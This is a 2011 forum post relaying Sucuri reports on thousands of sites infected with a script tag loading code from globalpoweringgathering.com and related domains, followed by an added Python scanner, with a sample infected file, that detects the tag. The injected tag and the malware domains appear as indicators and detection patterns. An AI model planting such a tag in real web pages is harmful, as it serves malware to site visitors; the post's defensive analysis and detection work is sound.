Mass infections globalpoweringgathering .com


AplusWebMaster
Posted 25 April 2011 - 09:32 PM


Mass infections – globalpoweringgathering .com
- http://blog.sucuri.n...hering-com.html
April 25, 2011 - "We first detected malware from globalpoweringgathering .com almost a month ago, and posted on our blog* about it. But just in the last few days, we started to see a big increase in the number of sites infected with it. We were able to catalog and find almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page** (and it is growing each day – just yesterday it was less than 1 thousand)... On our original post, we explained this malware, which was injecting encoded JavaScript directly into the WordPress database. However, on the latest infections, we are seeing the following code added directly to the HTML or PHP files (with no obfuscation):
< script src="http ://globalpoweringgathering .com/in.php?n=15"..
With some variations, with just a number changing:
http ://globalpoweringgathering .com/in.php?n=15
http ://globalpoweringgathering .com/in.php?n=25
http ://globalpoweringgathering .com/in.php?n=2
http ://globalpoweringgathering .com/in.php?n=9
Note that this is very similar to the "Hilary Kneber" malware distributed by these domains (hosted on the same IP addresses):
globalpoweringgathering .com
lessthenaminutehandle .com
lessthenaseconddeal .com
welcometotheglobalisnet .com ...
We are seeing multiple causes. The most common was related to the usage of old versions of web applications (like WordPress, Joomla, etc). However, we are also seeing HTML-only sites hacked that got compromised via FTP due to stolen passwords. So make sure your sites are updated and change your passwords (making sure to use a strong password, that your desktop is not compromised, etc)..."
* http://blog.sucuri.n...re-updates.html

** http://safebrowsing....ggathering.com/
"... Malicious software includes 37 scripting exploit(s)... It infected 1919 domain(s)..."

- http://blog.sucuri.n...directions.html
April 26, 2011 - "Today we started to see a lot of sites infected with an iframe malware from jquery4html .co.cc (yes, always the .co.cc)... when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:
The domain jquery4html.co.cc is available Continue to registration >>
If you want to build a site at this address, please visit us at www .co.cc
We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore... Too bad.
A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection .com, hilitsors .cz.cc and many other intermediaries... There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com..."
(More detail at the blog.sucuri.net URL above.)


Edited by AplusWebMaster, 27 April 2011 - 07:01 AM.

.The machine has no brain.
 ......... Use your own.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...

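The post describes the unobfuscated variant as a plain `<script src="http://globalpoweringgathering.com/in.php?n=N">` tag appended to HTML or PHP files, with only the number changing, and names three sibling domains on the same IP addresses. The following scanner is an added example written for this thread, not code from the post or from Sucuri: it walks a web root and reports every file and line carrying that tag for any of the four listed domains and any value of `n`. The extension list, the `www.` tolerance and the embedded sample files are assumptions made here for illustration.

```python
import os
import re
from typing import Iterator, List, Tuple

# Distribution domains named in the post (hosted on the same IP addresses).
DOMAINS = [
    "globalpoweringgathering.com",
    "lessthenaminutehandle.com",
    "lessthenaseconddeal.com",
    "welcometotheglobalisnet.com",
]

# Signature for the plaintext injection: a <script> tag whose src loads
# in.php?n=<integer> from one of the domains above. Whitespace, quoting
# and case are tolerated because the tag is hand-appended to files;
# accepting an optional "www." is an assumption, not something the post shows.
_DOMAIN_ALT = "|".join(re.escape(d) for d in DOMAINS)
INJECTION_RE = re.compile(
    r"<\s*script[^>]*\bsrc\s*=\s*[\"']?\s*https?://(?:www\.)?("
    + _DOMAIN_ALT
    + r")/in\.php\?n=(\d+)",
    re.IGNORECASE,
)

# File types worth scanning (assumed; the post mentions HTML and PHP files).
SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js")


def find_injections(text: str) -> List[Tuple[str, int, int]]:
    """Return (domain, n, line_number) for every injected tag found in text."""
    hits = []
    for m in INJECTION_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((m.group(1).lower(), int(m.group(2)), line_no))
    return hits


def scan_tree(root: str) -> Iterator[Tuple[str, str, int, int]]:
    """Walk root and yield (path, domain, n, line) for each hit in web files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                # errors="replace" keeps binary junk in a file from aborting the scan
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for domain, n, line in find_injections(text):
                yield path, domain, n, line


# Constructed samples (not captured from a real site): a WordPress-style
# footer with the tag appended after </body>, and a clean page for contrast.
SAMPLE_INFECTED = (
    "<?php wp_footer(); ?>\n"
    "</body>\n"
    '<script src="http://globalpoweringgathering.com/in.php?n=15"></script>\n'
    "</html>\n"
)
SAMPLE_CLEAN = '<script src="/wp-includes/js/jquery.js"></script>\n'

if __name__ == "__main__":
    import sys

    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, domain, n, line in scan_tree(root):
        print(f"{path}:{line}: {domain} in.php?n={n}")
```

Run it against a copy of the document root (`python scan.py /var/www/html`). It only catches the unobfuscated file-based variant; the earlier variant the post mentions, encoded JavaScript injected into the WordPress database, needs a query against `wp_posts` and `wp_options` rather than a file walk, and a hit here should be followed by the remediation the post recommends (update the web application, rotate FTP and admin passwords from a clean machine) rather than just deleting the tag.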